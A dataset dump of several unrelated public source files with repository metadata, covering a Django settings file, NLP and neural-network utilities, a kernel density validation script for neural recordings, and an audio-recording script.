print("Signatures:", signature_repository.signatures_by_signee_id)
print("Assets:", asset_service.asset_by_id)
|
[
"ian@fyianlai.com"
] |
ian@fyianlai.com
|
24d36a2217c9007fbb6bd84f731969b932ae222c
|
3cfca574323bf9c1955b5e543d3b9335c4072b64
|
/magalu_api/settings.py
|
a7423a645db27b17b94b3982521544d0bd151a98
|
[] |
no_license
|
otavioremedio/magalu_python
|
ece99deb7288fda676e061b1ee984d2a51ad0f93
|
4df8b148ffaa0c113ad619a82b42b0e90a5172e1
|
refs/heads/master
| 2020-06-05T14:54:23.292517
| 2019-06-18T04:28:54
| 2019-06-18T04:28:54
| 192,465,249
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,179
|
py
|
"""
Django settings for magalu_api project.
Generated by 'django-admin startproject' using Django 2.2.2.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '-s7s%(uc(sz9co@66h*!e2!!z(m0860bytdg6qobn&4l7wy23e'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'magalu',
'rest_framework'
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'magalu_api.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')]
,
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'magalu_api.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
|
[
"otavioremedio@gmail.com"
] |
otavioremedio@gmail.com
|
be93bf7f1663533f7ff527947dde250cdbb03ee5
|
07cc1454dd3c2782e0459aead9c950b603bdd613
|
/code/process_squad.py
|
bfb81312c6affabb55db28f8ac15c7e2315e8fce
|
[] |
no_license
|
muhammadyaseen/snlp-project
|
ae733e5e399470f16fb26b1f02ae141b997280f7
|
a9f491a786632fff316846d5a3399479928db863
|
refs/heads/master
| 2022-12-03T22:06:07.104215
| 2020-08-19T09:13:41
| 2020-08-19T09:13:41
| 285,236,646
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,516
|
py
|
"""
The purpose of this processing script is to convert the SQuAD dataset
in a similar format to WikiQA dataset so that we can use it with the
built-in data loader and use it in pairwise ranking setting.
"""
import json
SQUAD_ROOT = "/home/yaseen/Course Work/snlp-project/data/"
SQUAD_DEV = SQUAD_ROOT + "dev-v1.1.json"
SQUAD_TRAIN = SQUAD_ROOT + "train-v1.1.json"
SQUAD_DEV_P = SQUAD_ROOT + "dev-v1.1-processed.json"
SQUAD_DEV_P = SQUAD_ROOT + "train-v1.1-processed.json"
def load_and_process(path=SQUAD_DEV):
data_json = json.load(open(path,'r'))
# list of pages, where each element has 'title' and 'paragraphs' keys.
# title is title of Wiki page and, paragraphs are paras from that page
# Each title/pages contains list of paragraph objects which consist of
# 'context' and 'question-answers' i.e. 'qas'
pages = data_json['data']
for wiki_page in pages:
pg_title = wiki_page['title']
pg_paras = wiki_page['paragraphs'] # list object - with context and qas keys
for para in pg_paras:
print("\n\n")
print(para['context'])
print("\n\n")
for qa in para['qas']:
q = qa['question']
print("\nQuestion: ", q)
ans_texts = set([ans_text['text'] for ans_text in qa['answers']])
print(ans_texts)
break
break
if __name__ == "__main__":
load_and_process(SQUAD_DEV)
print("done")
|
[
"mohammad_yaseen13@live.com"
] |
mohammad_yaseen13@live.com
|
7ebdf48974f905586bd57d67bca70a0a4286bf9c
|
017d4134fea04d32d31c85fd8457b3ef8ac86bf4
|
/ceshi.py
|
e270ea78f02f327f5a4e35414c1d730b7ac1b1e4
|
[] |
no_license
|
qiuxianruoke/ZhuTian_for_python
|
4e2f9111c1eed4146e10f4a8151da22f1342afa4
|
9e4c75503b71d0c2af82426b4d68d23f9af62c9e
|
refs/heads/master
| 2023-09-03T04:49:53.605599
| 2021-10-16T13:38:01
| 2021-10-16T13:38:01
| 331,208,931
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 107
|
py
|
a = [1, 2, 3, 4, 5]
#print(a[0])
l = len(a)
for i in range(len(a)):
a.remove(a[i])
print(a[i],'\n')
|
[
"3237276907@qq.com"
] |
3237276907@qq.com
|
af2e52b46844239c7c94bcf9148beaf21690047d
|
f7ab3bcf18edf83219898d1e512161e61261a31b
|
/xbowflow/scripts/xflow-stat
|
b7221c8f442df9d5bd1ac1010995e52a7aa3f097
|
[
"MIT"
] |
permissive
|
shozebhaider/Project-Xbow
|
1e98446cc91c23844f516f62c8b2f044bb6b0936
|
079a5ebf730b5a3cb605b48fac51e721bc293ff8
|
refs/heads/master
| 2020-05-26T00:08:21.882915
| 2019-05-22T11:26:14
| 2019-05-22T11:26:14
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,141
|
#!/usr/bin/env python
from __future__ import print_function
from xbowflow._version import __version__
from xbowflow.clients import dask_client
import argparse
def stat(client, args):
info = (client.scheduler_info())
if not args.summary:
print(' {:30s} {:7s} {:9s} {:9s}'.format('Worker name', 'ncores', 'executing', 'in_memory'))
for worker in info['workers']:
print('{name:30s} {ncores:5d} {metrics[executing]:9d} {metrics[in_memory]:9d}'.format(**info['workers'][worker]))
else:
n_ex = 0
for worker in info['workers']:
n_ex += int(info['workers'][worker]['metrics']['executing'])
if n_ex == 0:
print('Idle')
else:
print('Busy')
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Report on the status of the xbow cluster')
parser.add_argument('--summary', '-s', action='store_true', help='Summary information only')
parser.add_argument('-V', '--version', action='version', version=__version__)
args = parser.parse_args()
client = dask_client()
stat(client, args)
client.close()
|
[
"charles.laughton@nottingham.ac.uk"
] |
charles.laughton@nottingham.ac.uk
|
|
e2c44190d4a0c77a111d4d07700decfd13262c29
|
1925aa0e43b35cfeb65f6bbc5ca9c2a6d75ffd52
|
/visdial/common/self_attention.py
|
40128fce6d9627c2baf1f6db3825edbdcd76c59b
|
[] |
no_license
|
davidnvq/visdial
|
07dbfabd1852ca6c24d4e420c96180978de5e731
|
ab6fa3f2d84690c981f512c29f1de72330ed38b2
|
refs/heads/master
| 2023-07-03T05:36:02.101352
| 2021-08-05T12:41:18
| 2021-08-05T12:41:18
| 185,401,550
| 33
| 6
| null | 2020-11-18T22:46:30
| 2019-05-07T12:52:59
|
Python
|
UTF-8
|
Python
| false
| false
| 1,496
|
py
|
import torch
import torch.nn as nn
class SelfAttention(nn.Module):
"""This module perform self-attention on an utility
to summarize it into a single vector."""
def __init__(self, hidden_size):
super(SelfAttention, self).__init__()
self.attn_linear = nn.Sequential(
nn.Linear(hidden_size, hidden_size),
nn.ReLU(inplace=True),
nn.Linear(hidden_size, 1)
)
self.attn_weights = None
def forward(self, x, mask_x):
"""
Arguments
---------
x: torch.FloatTensor
The input tensor which is a sequence of tokens
Shape [batch_size, M, hidden_size]
mask_x: torch.LongTensor
The mask of the input x where 0 represents the <PAD> token
Shape [batch_size, M]
Returns
-------
summarized_vector: torch.FloatTensor
The summarized vector of the utility (the context vector for this utility)
Shape [batch_size, hidden_size]
"""
# shape [bs, M, 1]
attn_weights = self.attn_linear(x)
attn_weights = attn_weights.masked_fill(mask_x.unsqueeze(-1) == 0, value=-9e10)
attn_weights = torch.softmax(attn_weights, dim=-2)
self.attn_weights = attn_weights
# shape [bs, 1, hidden_size]
summarized_vector = torch.matmul(attn_weights.transpose(-2, -1), x)
summarized_vector = summarized_vector.squeeze(dim=-2)
return summarized_vector
|
[
"quanguet@gmail.com"
] |
quanguet@gmail.com
|
369ed13baeabeb36c71b262ee12e2fc17e7e2eb6
|
a4b3245401e80dc6f19065bf2b9c54686a64b6cc
|
/Stack.py
|
a4b40b0d5469030c8bfbf2d0014a7cdb46590ca7
|
[] |
no_license
|
karim-eddin/python-datastructure
|
5277cc11f88957925631066959b048c9372e0f48
|
ec8579174c60182c241f808f1f9ee6c50588e690
|
refs/heads/master
| 2023-02-27T23:27:03.666084
| 2021-02-11T10:40:46
| 2021-02-11T10:40:46
| 335,523,409
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 549
|
py
|
#encoding=utf-8
class Stack:
stk_lst = []
def top(self):
if len(self.stk_lst) == 0:
return None
else:
return self.stk_lst[-1]
def length(self):
return len(self.stk_lst)
def pop(self):
if len(self.stk_lst) == 0:
return None
else:
self.stk_lst.pop()
def push(self, value):
self.stk_lst.append(value)
def output(self):
for val in self.stk_lst:
print(str(val))
|
[
"karimeddinn@hotmail.com"
] |
karimeddinn@hotmail.com
|
287490e47c0c860a01c42ee7aae05e6c42c86fdd
|
a82e0bd93cb966fefbea8795589768eb5a5a65c0
|
/model.py
|
c92716d9fb093a724e46f93e5f9ebc8bbcd776c7
|
[
"MIT"
] |
permissive
|
bfmat/StopSignFinder
|
1b9e935fc1471218df37d4830a84a854985eec8c
|
8d41b86a28f1c48ba23e504ccb65f60115ef29f6
|
refs/heads/master
| 2021-09-13T06:20:32.587140
| 2018-04-25T21:24:57
| 2018-04-25T21:24:57
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,332
|
py
|
from keras.layers import Dense, Flatten
from keras.layers.convolutional import Conv2D
from keras.models import Sequential
# A very simple convolutional neural network model that will be used to predict the probability of the presence of a
# stop sign in a small square image
# Created by brendon-ai, January 2018
# Main function to create model
def get_model(window_size):
# Hyperbolic tangent activation function
activation = 'tanh'
# Initialize the Sequential model
model = Sequential()
# Two convolutional layers
model.add(Conv2D(
input_shape=(window_size, window_size, 3),
kernel_size=4,
filters=16,
activation=activation
))
model.add(Conv2D(
kernel_size=3,
filters=64,
activation=activation
))
model.add(Conv2D(
kernel_size=2,
filters=64,
activation=activation
))
# Fully connected layers
model.add(Flatten())
model.add(Dense(64, activation=activation))
model.add(Dense(8, activation=activation))
# Sigmoid activation is used for the last layer because its outputs are in the range of 0 to 1
model.add(Dense(1, activation='sigmoid'))
# Compile model with Adadelta optimizer
model.compile(
loss='mse',
optimizer='adadelta'
)
return model
|
[
"brendon-m@outlook.com"
] |
brendon-m@outlook.com
|
4598001c5648f08752ef2002d4ba2a58a4b810b4
|
94e06376dc265c7bf1a2e51acb9714d02b21503a
|
/python打卡/day9_数字.py
|
0303d4bab06f6795e5925726a39bafdecf382745
|
[] |
no_license
|
zhangquanliang/python
|
4b2db32bed4e4746c8c49c309563f456dc41c6be
|
f45ef96e385b1cd6c5dfb53bf81042d953a9ec46
|
refs/heads/master
| 2021-04-26T23:30:12.217397
| 2019-03-20T06:18:14
| 2019-03-20T06:18:14
| 124,005,916
| 11
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 640
|
py
|
# -*- coding: utf-8 -*-
# 1. 内嵌整数列表中的指相加
def nested_sum(t):
a = 0
for x in t:
for y in x:
a += y
print(a)
# 2. 接受数字列表,返回累计和
def cumsum(t):
list = []
a = 0
for x in t:
a += x
list.append(a)
print(list)
# 3. 接受一个列表,返回新列表,包含除第一个和最后一个元素外的所有值
def middle(t):
t.pop(0)
t.pop()
print(t)
# t = [1, 2, 3, 4, 1212, 121]
# middle(t)
# 4. 斐波纳契数列
a, b = 0, 1
for i in range(1, 13):
print('第%s个月:%s对兔子' % (i, b))
a, b = b, a + b
|
[
"1007228376@qq.com"
] |
1007228376@qq.com
|
06f43a44fe4cb0a5dafc0a5b71287555443fcdce
|
39a3794a754e4e1972e7e60cbed27ac5759078ac
|
/kde_validation_bio_sim_record_result.py
|
7fbb7bab3c98dd8db1004b8ba41d06c13ea36456
|
[] |
no_license
|
Polina17/Epilepsy_Validation
|
87bcaea99be79921510bb11926bda34360b1b639
|
fbb57a935098ab8829c682e9fd5c23980c09d457
|
refs/heads/master
| 2023-02-26T15:11:51.135080
| 2021-02-02T14:52:41
| 2021-02-02T14:52:41
| 327,878,462
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 13,840
|
py
|
# Скрипт для нахождения p_value между био и симуляционными данными
# при применении косинусного ядра к нормализованным и нормализованным фильтрованным
# данным с построением графиков
import math
import matplotlib.pyplot as plt
import scipy.integrate
from numpy import inf, exp
import scipy.io
# функция для нахождения среднего значения выборки
def mean(array):
sum = 0
for elem in array:
sum += elem
result = sum/len(array)
return result
# функция для нахождения среднего квадратического отклонения выборки
def standart_deviation(array):
sqr_sum = 0
for elem in array:
sqr_sum += math.pow(elem, 2)
result = sqr_sum/len(array) - math.pow(mean(array), 2)
return math.sqrt(result)
# функция для нормализации данных (минус среднее / стандартное отклонение)
def normal(array): # нормализуем исходный массив
result = []
mean_value = mean(array)
standart_dev_value = standart_deviation(array)
for elem in array:
e = (elem-mean_value)/standart_dev_value
result.append(e)
return result
# функция для нахождения суммы значений косинусного ядра в данной точке
def kernel_cos_sum(array, x, h): # array выборка, x - знач., в котором ищем плотность, h - сглаживающий параметр
sum = 0
for elem in array:
u = (x - elem)/h
if (math.fabs(u) <= 1):
K = (math.pi/4) * math.cos(u*math.pi/2)
else:
K = 0
sum +=K
return sum
# функция для нахождения значений плотности вероятности в данных точках
# array - выборка
# h - сглаживающий параметр
# values - точки, в которых ищем плотность
# type - тип ядра
def density_estim(array, h, values, type):
result = []
for elem in values:
if (type == 'cos'):
result.append(kernel_cos_sum(array, elem, h) * (1 / (len(array) * h)))
return result
# функция для нахождения внутрипараметрического различия
# биологических данных для нахождения тестовой статистики
def difference_bio(bio, h_bio):
sum = 0
for elem in bio:
for el in bio:
u = (elem-el) / h_bio
if (math.fabs(u) <= 1):
K = (math.pi / 4) * math.cos(u * math.pi / 2)
else:
K = 0
sum += K
result = sum / (math.pow(len(bio), 2) * h_bio)
return result
# функция для нахождения внутрипараметрического различия
# симуляционных данных для нахождения тестовой статистики
def difference_neuron(neuron, h_neuron):
sum = 0
for elem in neuron:
for el in neuron:
u = (elem - el) / h_neuron
if (math.fabs(u) <= 1):
K = (math.pi / 4) * math.cos(u * math.pi / 2)
else:
K = 0
sum += K
result = sum / (math.pow(len(neuron), 2) * h_neuron)
return result
# функция для нахождения межпараметрического различия симуляционных и биологических данных
# при сглаживающем параметре для био
# для нахождения тестовой статистики
def difference_bio_neuron_h_bio(bio, neuron, h_bio):
sum = 0
for elem in bio:
for el in neuron:
u = (elem - el) / h_bio
if (math.fabs(u) <= 1):
K = (math.pi / 4) * math.cos(u * math.pi / 2)
else:
K = 0
sum += K
result = sum / (len(bio) * len(neuron) * h_bio)
return result
# функция для нахождения межпараметрического различия симуляционных и биологических данных
# при сглаживающем параметре для симуляционных данных
# для нахождения тестовой статистики
def difference_bio_neuron_h_neuron(bio, neuron, h_neuron):
sum = 0
for elem in bio:
for el in neuron:
u = (elem - el) / h_neuron
if (math.fabs(u) <= 1):
K = (math.pi / 4) * math.cos(u * math.pi / 2)
else:
K = 0
sum += K
result = sum / (len(bio) * len(neuron) * h_neuron)
return result
# функция для нахождения тестовой статистики при заданных сглаживающих параметрах
def statistics(bio, neuron, h_bio, h_neuron):
T = difference_bio(bio, h_bio) + difference_neuron(neuron, h_neuron) - difference_bio_neuron_h_bio(bio, neuron, h_bio) - difference_bio_neuron_h_neuron(bio, neuron, h_neuron)
return T
# функция для нахождения значения p_value при заданных сглаживающих параметрах
def p_value(bio, neuron, h_bio, h_neuron):
T = statistics(bio, neuron, h_bio, h_neuron)
f = lambda x: exp((-x ** 2)/2)
integral = scipy.integrate.quad(f, -inf, T)
result = 1/(math.sqrt(2*math.pi)) * integral[0]
return result
# Функция для получения обобщённых данных
def full(sim_data):
result = []
for elem in sim_data:
for el in elem:
result.append(el)
return result
# Функция для нахождения массива значений, в которых будем искать значение плотности
def values_f(bio_test, sim_test):
min_v = min(min(bio_test), min(sim_test))
max_v = max(max(bio_test), max(sim_test))
values = [] # формируем массив значений, в которых будем искать плотность
step = (max_v - min_v) / 3000 # число зависит от объёма выборки
for j in range(3001):
value = min_v + (step * j)
values.append(value) # массив значений для рассчёта плотности bio
return values
# Функция для фильтрации данных
def test_f(sim_data, filter):
sim_data_sort = sorted(sim_data, key=float)
sim_test = []
for elem in sim_data_sort:
if elem > filter or elem < filter*(-1): # Фильтруем
sim_test.append(elem)
return sim_test
# Получаем симуляционные данные
sim_data = []
f = open('/home/polina/диплом/эпилепсия_данные_sim/sim_data_prepare2', 'r')
elem = []
for line in f:
elem.append(float(line))
# берём каждое 10-е значение, т.к. био данные - по мс, сим - по 0.1 мс
for i in range(15): # 0-600, 601-1201
sim_data.append(elem[i*601+1 : (i*601)+601 : 10]) # получили sim data по сенсорам
print('длина sim ', len(sim_data))
# получаем данные био
mat = scipy.io.loadmat('/home/polina/диплом/эпилепсия_данные_био/2011 may 03 P32 BCX rust/2011_05_03_0023.mat', squeeze_me=True)
data = mat['lfp']
print(data.shape)
bio_data = []
for j in range(15):
result = []
for i in range(2000):
result.append(data[i, j, 40]) # № записи
bio_data.append(result)
print('длина bio ', len(bio_data)) # получили lfp био по сенсорам - 15 массивов по 2000 данных
print()
fig = plt.figure(1) #первое окно с графиками
#density_estim_bio_cos = [] # Для отрисовки по сенсорам
#density_estim_sim_cos = []
#density_estim_bio_cos_0_1 = []
#density_estim_sim_cos_0_1 = []
#density_estim_bio_cos_1 = []
#density_estim_sim_cos_1 = []
T_cos = []
T_cos_0_1 = []
T_cos_1 = []
p_cos = []
p_cos_0_1 = []
p_cos_1 = []
#values_array = []
#values_array_0_1 = []
#values_array_1 = []
h = [0.1, 0.1] # h_bio, h_sim
h_0_1 = [0.1, 0.2]
h_1 = [0.07, 0.15]
for i in range(0, 15): # 0,5 5,10 10,15
bio_test = normal(bio_data[i])
sim_test = normal(sim_data[i])
bio_test_0_1 = test_f(normal(bio_data[i]), 0.1)
sim_test_0_1 = test_f(normal(sim_data[i]), 0.1)
bio_test_1 = test_f(normal(bio_data[i]), 1)
sim_test_1 = test_f(normal(sim_data[i]), 1)
# values = values_f(bio_test, sim_test) # Для отрисовки по сенсорам
# values_array.append(values)
# values_0_1 = values_f(bio_test_0_1, sim_test_0_1)
# values_array_0_1.append(values_0_1)
# values_1 = values_f(bio_test_1, sim_test_1)
# values_array_1.append(values_1)
# density_estim_bio_cos.append(density_estim(bio_test, h[0], values, 'cos'))
# density_estim_sim_cos.append(density_estim(sim_test, h[1], values, 'cos'))
# density_estim_bio_cos_0_1.append(density_estim(bio_test_0_1, h_0_1[0], values_0_1, 'cos')) # h[i-5][0], h[i-10][0]
# density_estim_sim_cos_0_1.append(density_estim(sim_test_0_1, h_0_1[1], values_0_1, 'cos'))
# density_estim_bio_cos_1.append(density_estim(bio_test_1, h_1[0], values_1, 'cos'))
# density_estim_sim_cos_1.append(density_estim(sim_test_1, h_1[1], values_1, 'cos'))
T_cos.append(statistics(bio_test, sim_test, h[0], h[1]))
T_cos_0_1.append(statistics(bio_test, sim_test, h_0_1[0], h_0_1[1]))
T_cos_1.append(statistics(bio_test, sim_test, h_1[0], h_1[1]))
p_cos.append(p_value(bio_test, sim_test, h[0], h[1]))
p_cos_0_1.append(p_value(bio_test_0_1, sim_test_0_1, h_0_1[0], h_0_1[1]))
p_cos_1.append(p_value(bio_test_1, sim_test_1, h_1[0], h_1[1]))
print('Сенсор ', i+1)
print('p-value ', p_cos, p_cos_0_1, p_cos_1)
bio_full = normal(full(bio_data))
sim_full = normal(full(sim_data))
bio_full_0_1 = test_f(normal(full(bio_data)), 0.1)
sim_full_0_1 = test_f(normal(full(sim_data)), 0.1)
bio_full_1 = test_f(normal(full(bio_data)), 1)
sim_full_1 = test_f(normal(full(sim_data)), 1)
values = values_f(bio_full, sim_full)
values_0_1 = values_f(bio_full_0_1, sim_full_0_1)
values_1 = values_f(bio_full_1, sim_full_1)
density_estim_bio_full = density_estim(bio_full, h[0], values, 'cos')
density_estim_sim_full = density_estim(sim_full, h[1], values, 'cos')
density_estim_bio_full_0_1 = density_estim(bio_full_0_1, h_0_1[0], values_0_1, 'cos')
density_estim_sim_full_0_1 = density_estim(sim_full_0_1, h_0_1[1], values_0_1, 'cos')
density_estim_bio_full_1 = density_estim(bio_full_1, h_1[0], values_1, 'cos')
density_estim_sim_full_1 = density_estim(sim_full_1, h_1[1], values_1, 'cos')
T_full = statistics(bio_full, sim_full, h[0], h[1])
T_full_0_1 = statistics(bio_full_0_1, sim_full_0_1, h_0_1[0], h_0_1[1])
T_full_1 = statistics(bio_full_1, sim_full_1, h_1[0], h_1[1])
p_full = p_value(bio_full, sim_full, h[0], h[1])
p_full_0_1 = p_value(bio_full_0_1, sim_full_0_1, h_0_1[0], h_0_1[1])
p_full_1 = p_value(bio_full_1, sim_full_1, h_1[0], h_1[1])
print('По исходным нормализованным данным')
for i in range(15):
print(T_cos[i])
print(p_cos[i])
print()
print('По нормализованным фильтрованным [-0.1; 0.1] данным')
for i in range(15):
print(T_cos_0_1[i])
print(p_cos_0_1[i])
print()
print('По нормализованным фильтрованным [-1; 1] данным')
for i in range(15):
print(T_cos_1[i])
print(p_cos_1[i])
print()
print('По обобщённым нормализованным данным')
print(T_full)
print(p_full)
print()
print('По обобщённым нормализованным фильтрованным [-0.1; 0.1] данным')
print(T_full_0_1)
print(p_full_0_1)
print()
print('По обобщённым нормализованным фильтрованным [-1; 1] данным')
print(T_full_1)
print(p_full_1)
plt.subplot(3, 1, 1)
plt.title('Симуляция 2 / Эксперимент 23. Запись 40. Обобщённые нормализованные данные, cos ядро')
plt.plot(values, density_estim_bio_full, 'g', label='bio. h_bio = %.2f, h_sim = %.2f' % (h[0], h[1]), linewidth=0.8)
plt.plot(values, density_estim_sim_full, 'b', label='sim, p=%.5f' % p_full, linewidth=0.8)
plt.xticks([])
plt.legend(loc=2, fontsize=9)
plt.subplot(3, 1, 2)
plt.title('Обобщённые нормализованные данные. Фильтрация [-0.1; 0.1]') # pad=0
plt.plot(values_0_1, density_estim_bio_full_0_1, 'g', label='bio. h_bio = %.2f, h_sim = %.2f' % (h_0_1[0], h_0_1[1]), linewidth=0.8)
plt.plot(values_0_1, density_estim_sim_full_0_1, 'b', label='sim, p=%.5f' % p_full_0_1, linewidth=0.8)
plt.ylabel('Значение плотности вероятности')
plt.xticks([]) # Сделать ось x невидимой
plt.legend(loc=2, fontsize=9)
plt.subplot(3, 1, 3)
plt.title('Обобщённые нормализованные данные. Фильтрация [-1; 1]')
plt.plot(values_1, density_estim_bio_full_1, 'g', label='bio. h_bio = %.2f, h_sim = %.2f' % (h_1[0], h_1[1]), linewidth=0.8)
plt.plot(values_1, density_estim_sim_full_1, 'b', label='sim, p=%.5f' % p_full_1, linewidth=0.8)
plt.xlabel('Потенциал локального поля, мВ')
plt.legend(loc=2, fontsize=9)
plt.show()
|
[
"zyranovap@gmail.com"
] |
zyranovap@gmail.com
|
a9c949157556c29400086fe4868e2675154a03cb
|
00e25b8aa2e4ddd33cfd912f68625cab59588184
|
/inputTest7.py
|
631e98ea7e65b9a4d783f25e72d481b25a9d8287
|
[] |
no_license
|
jesenator/Violin-analysis-system
|
578fba2de31cde9890ae28bf7616ad575f11f2d6
|
19239e98dbb9e615aea5c9e369ce7e89d12c7d43
|
refs/heads/main
| 2023-07-18T09:18:47.980137
| 2021-08-31T17:22:59
| 2021-08-31T17:22:59
| 390,883,362
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,479
|
py
|
# inputTest6.1.py
# working on splitting channel input to two arrays - completed
################################################# functions
def getData(itr):
def writeFile(p, frames, channels, filename):
print("writing " + filename)
wf = wave.open(filename, 'wb')
wf.setnchannels(channels)
wf.setsampwidth(p.get_sample_size(FORMAT))
wf.setframerate(RATE)
wf.writeframes(b''.join(frames))
wf.close()
# print sound level and threshold to terminal
def printSound(rms, THRESHOLD):
bars = ""
scale_factor = 6
for i in range(int(rms/scale_factor)):
bars = bars + "|"
for i in range (rms/scale_factor, THRESHOLD/scale_factor):
bars = bars + " "
bars = bars + "-"
print(bars)
# define callback for pyaudio
def callback(data, frame_count, time_info, status):
frame = np.fromstring(data, dtype=np.int16)
hammerChannel = frame[HAMMERCHANNEL::CHANNELS]
micChannel = frame[MICCHANNEL::CHANNELS]
hammerData = hammerChannel.tostring()
micData = micChannel.tostring()
rms = audioop.rms(data, 2)
hammerRms = audioop.rms(hammerData, 2)
micRms = audioop.rms(micData,2)
if (recording != 2):
# printSound(rms, THRESHOLD)
hammerFramesDe.append(hammerData)
micFramesDe.append(micData)
framesDe.append(data)
rmsDe.append(rms)
hammerRmsDe.append(hammerRms)
micRmsDe.append(micRms)
diff = datetime.now() - startTime
seconds = diff.total_seconds()
xDe.append(round(seconds, 2))
# print(len(framesDe))
# while the sound threshold has not been surpassed, trim the buffers to a set length
if len(rmsDe) > RECORDING_FRAMES + BUFFER_FRAMES + 3:
rmsDe.popleft()
xDe.popleft()
hammerRmsDe.popleft()
micRmsDe.popleft()
if len(framesDe) > BUFFER_FRAMES and recording == 0:
framesDe.popleft()
hammerFramesDe.popleft()
micFramesDe.popleft()
# start recording if sound threshold is surpassed
if (hammerRms > THRESHOLD and recording == 0):
global time
time = datetime.now()
# recording = True
startRecording() # this is a hack of a solution because
# assigning the variable within the callback
# function caused issues.
print("*** recording")
# stop taking data from the audio stream and stop the plot
if recording == 1 and (datetime.now() - time > timedelta(seconds = RECORD_SECONDS)):
print("*** recording finished")
print("close plotter window")
endRecording()
animate(0)
ani.event_source.stop()
return (data, pyaudio.paContinue)
def animate(i):
ax.clear()
if recording == 0:
plt.title("listening")
elif recording == 1:
plt.title("recording")
elif recording == 2:
plt.title("recording finished - close plotter window")
plt.xlabel("time")
plt.ylabel("volume")
x = xDe
y = rmsDe
y2 = hammerRmsDe
y3 = micRmsDe
ax.set_ylim(0, Y_LIMIT)
ax1.set_ylim(0, Y_LIMIT)
ax2.set_ylim(0, Y_LIMIT)
ax3.set_ylim(0, Y_LIMIT)
# ax.plot(x, y)
ax1.plot(x, np.full(len(y), THRESHOLD), label="hammer threshold")
ax2.plot(x, y2, label="hammer")
ax3.plot(x, y3, label="mic")
ax2.legend()
def startRecording():
global recording
recording = 1
def endRecording():
global recording
recording = 2
def getSeconds():
milliseconds = int(datetime.strftime(datetime.now(), '%f'))
seconds = round(milliseconds/1000, 1)
# print(seconds)
print(milliseconds)
return seconds
def encode(line):
temp = base64.b64encode(bytes(line, encoding))
temp = temp.decode("Ascii") + "\n"
encoded = bytes(temp, encoding)
return encoded
def serialWrite(p, filename, frames):
ser.write(encode(filename))
if ".txt" in filename:
f = open(filename, "r")
for line in f:
encoded = encode(line)
decoded = base64.b64decode(encoded)
# print("sending: " + decoded.decode("Ascii"), end="")
ser.write(encoded)
elif ".wav" in filename:
for frame in frames:
ser.write(encode(frame))
ser.write(bytes("*\n", encoding))
def upload(p, HAMMER_OUTPUT_FILE, MIC_OUTPUT_FILE, hammerFrames, micFrames):
ser = serial.Serial(port='/dev/ttyUSB0',
baudrate=115200,
parity=serial.PARITY_NONE,
stopbits=serial.STOPBITS_ONE,
bytesize=serial.EIGHTBITS,
timeout=1)
encoding = 'iso-8859-1'
serialWrite(p, HAMMER_OUTPUT_FILE, hammerFrames)
serialWrite(p, MIC_OUTPUT_FILE, MICFrames)
############################################ main
import sys
import pyaudio
import wave
import sys
import os
import struct
import numpy as np
import audioop
import matplotlib.pyplot as plt
import matplotlib.animation as animation
from datetime import timedelta
from datetime import datetime
import time
import collections
import serial
print("running inputTest.py")
p = pyaudio.PyAudio()
# pyaudio stream characteristics
CHUNK = int(1024*4)
FORMAT = pyaudio.paInt16
DEVICE_INDEX= 2
CHANNELS = 2
RATE = 44100
RECORD_SECONDS = 1.5
RECORDING_BUFFER_SECONDS = .2
# THRESHOLD = 120
# Y_LIMIT = THRESHOLD * 5
THRESHOLD = 50
Y_LIMIT = 1500
# MIC_VISUAL_MULTIPLIER = 3
startTime = datetime.now()
# ouput file names
OUTPUT_FILE = "output.wav"
